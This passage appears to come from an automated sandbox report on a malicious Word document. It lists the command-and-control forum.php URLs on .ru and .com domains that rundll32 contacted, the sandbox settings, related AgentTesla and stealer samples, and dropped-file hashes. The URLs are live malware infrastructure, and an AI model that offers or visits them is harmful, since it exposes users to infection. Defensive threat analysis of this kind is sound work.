                      http://rhopulforopme.ru/8/forum.phpvrundll32.exe, 00000005.00000003.2504428556.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2266316387.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1793878117.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://rhopulforopme.ru/8/forum.php7rundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2317554695.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2199214201.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2149855753.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002931000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phprundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://thowerteigime.com/8/forum.phpe.ru/8/forum.php7rundll32.exe, 00000005.00000003.2212107841.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://euvereginumet.ru/8/forum.phpteigime.com5rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://euvereginumet.ru/8/forum.phperundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2317554695.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002931000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327783614.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2287389842.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://api.ipify.orgrundll32.exe, rundll32.exe, 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://rhopulforopme.ru/8/forum.phperundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2149855753.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2154355980.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1767304866.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phpt.ru/8/forum.phperundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://euvereginumet.ru/8/forum.phpjrundll32.exe, 00000005.00000003.1767304866.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2197094603.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phpe.ru/8/forum.phprundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000292F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://euvereginumet.ru/8/forum.phplrundll32.exe, 00000005.00000003.2282571556.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://rhopulforopme.ru/8/forum.phpjrundll32.exe, 00000005.00000003.2259063062.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://rhopulforopme.ru/8/forum.phplrundll32.exe, 00000005.00000003.2154355980.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166981551.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://euvereginumet.ru/8/forum.phpsrundll32.exe, 00000005.00000003.1997207362.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2327783614.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2276651305.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1784421545.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://rhopulforopme.ru/8/forum.phpConrundll32.exe, 00000005.00000003.1997207362.000000000295B000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phper$rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000292F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://rhopulforopme.ru/8/forum.phpsrundll32.exe, 00000005.00000003.1759002125.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2322656876.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2252179688.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1942123360.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2620736040.000000000291A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2669273371.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2299435821.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2237144969.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2293982468.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2192261942.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2417726399.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2118717721.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2144410797.0000000002933000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://euvereginumet.ru/8/forum.php7rundll32.exe, 00000005.00000003.2329581893.0000000002934000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.w3.osplwow64.exe, 00000002.00000003.1442047761.000000000298A000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1443327802.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1445347987.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1442333308.0000000002998000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000002.00000003.1444033953.0000000002998000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://euvereginumet.ru/8/forum.phpConrundll32.exe, 00000005.00000003.2329581893.000000000295B000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://rhopulforopme.ru/8/forum.phpginumet.ru5rundll32.exe, 00000005.00000002.2669273371.0000000002925000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phpConrundll32.exe, 00000005.00000003.2199214201.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2278515571.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2305462785.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2254606007.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2238857143.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2145848295.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2628991391.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2212107841.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2203720473.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2216357507.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2008220028.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2289863703.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2295617717.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1870913373.000000000295B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2244437133.000000000295C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2261262500.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.000000000295D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2272679994.000000000295E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1759002125.0000000002949000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2229738232.000000000295B000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://euvereginumet.ru/8/forum.php.ru/8/forum.phrundll32.exe, 00000005.00000003.1777395785.0000000002933000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.php.ru/8/forum.phrundll32.exe, 00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phplrundll32.exe, 00000005.00000003.2628991391.0000000002954000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://thowerteigime.com/8/forum.phporopme.rucrundll32.exe, 00000005.00000002.2669273371.0000000002925000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        64.185.227.155
                        		api4.ipify.orgUnited States
                        		18450WEBNXUSfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:37.0.0 Beryl
                        Analysis ID:854354
                        Start date and time:2023-04-26 12:37:30 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 7m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                        Number of analysed new started processes analysed:7
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:1
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample file name:0524_4109399728218.doc
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winDOC@7/60@814/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 49.5% (good quality ratio 48.6%)
                        • Quality average: 84.9%
                        • Quality standard deviation: 23.2%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 36
                        • Number of non-executed functions: 161
                        Cookbook Comments:
                        • Found application associated with file extension: .doc

                        Warnings

                        • Exclude process from analysis (whitelisted): WMIADAP.exe, svchost.exe, WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.73.26, 2.19.229.151, 20.254.138.227, 20.254.144.98, 51.140.219.248, 20.58.112.2, 95.101.111.179, 95.101.111.168, 2.16.241.16, 2.16.241.4
                        • Excluded domains from analysis (whitelisted): self-events-data.trafficmanager.net, fs.microsoft.com, binaries.templates.cdn.office.net.edgesuite.net, self.events.data.microsoft.com, prod-eu.naturallanguageeditorservice.osi.office.net.akadns.net, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e26769.b.akamaiedge.net, a1847.dscg2.akamai.net, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus09.eastus.cloudapp.azure.com, metadata.templates.cdn.office.net, prod.fs.microsoft.com.akadns.net, binaries.templates.cdn.office.net
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        12:39:00API Interceptor21x Sleep call for process: splwow64.exe modified
                        12:39:09API Interceptor540x Sleep call for process: rundll32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        64.185.227.155CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                        • api.ipify.org/
                        aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        WolcGwXQ5c.exeGet hashmaliciousFicker Stealer, RHADAMANTHYS, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • api.ipify.org/
                        xc17rfFdOM.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        8Ghi4RAfH5.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        file.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=wef
                        48PTRR4pVY.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
                        • api.ipify.org/?format=qwd

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        api4.ipify.orgRFQ#985743-EQUIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        Zaplata,jpeg.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        PO2201235_T2-VEYA-Q000054033-T2.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        ORDER CONFIRMATION.SCRGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        Invoice_TIPLE00523-24.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        https://sv-wadax-ne-jp-spport.com/wadaxGet hashmaliciousHTMLPhisherBrowse
                        • 64.185.227.155
                        PURCHASE_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        PDA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77
                        IMG_6087721402pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        Order_confirmation#7682712.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        AUS-0004643378778897790987_pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        IFuIF5JyoX.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77
                        vQK5Ic8Xk4.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 64.185.227.155
                        SOA_of_Apr.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        90729.002L-billing Cn 2023.04.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 104.237.62.211
                        IMG_31802_88213pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        New_shipment.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 64.185.227.155
                        OriginalXShippingXDocXAW1266358.docGet hashmaliciousAgentTesla, zgRATBrowse
                        • 104.237.62.211
                        DHL-AWB_321546.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WEBNXUSRFQ#985743-EQUIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        Zaplata,jpeg.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        PO2201235_T2-VEYA-Q000054033-T2.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        ORDER CONFIRMATION.SCRGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        Invoice_TIPLE00523-24.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        https://sv-wadax-ne-jp-spport.com/wadaxGet hashmaliciousHTMLPhisherBrowse
                        • 64.185.227.155
                        PURCHASE_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        https://sourceforge.net/projects/ldapadmin/files/ldapadmin/1.8.3/LdapAdminExe-w64-1.8.3.zip/downloadGet hashmaliciousUnknownBrowse
                        • 67.220.228.200
                        PDA.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77
                        IMG_6087721402pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        Order_confirmation#7682712.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        AUS-0004643378778897790987_pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.237.62.211
                        IFuIF5JyoX.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77
                        vQK5Ic8Xk4.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 64.185.227.155
                        SOA_of_Apr.exeGet hashmaliciousAgentTeslaBrowse
                        • 173.231.16.77
                        90729.002L-billing Cn 2023.04.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 104.237.62.211
                        IMG_31802_88213pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 64.185.227.155
                        GHXCGHXCGJXC.exeGet hashmaliciousFormBookBrowse
                        • 216.18.208.202
                        New_shipment.exeGet hashmaliciousAgentTesla, zgRATBrowse
                        • 173.231.16.77

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):379722
                        Entropy (8bit):4.9088149211082355
                        Encrypted:false
                        SSDEEP:1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
                        MD5:E9FB5A0DF105C6F7F80E8B650DF56AAB
                        SHA1:0B7F6ADA05673F2535E61267C3CB428489ECEB55
                        SHA-256:A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
                        SHA-512:65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,

                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_17.ttf

                        Download File
                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
                        Category:dropped
                        Size (bytes):672416
                        Entropy (8bit):6.566110770587873
                        Encrypted:false
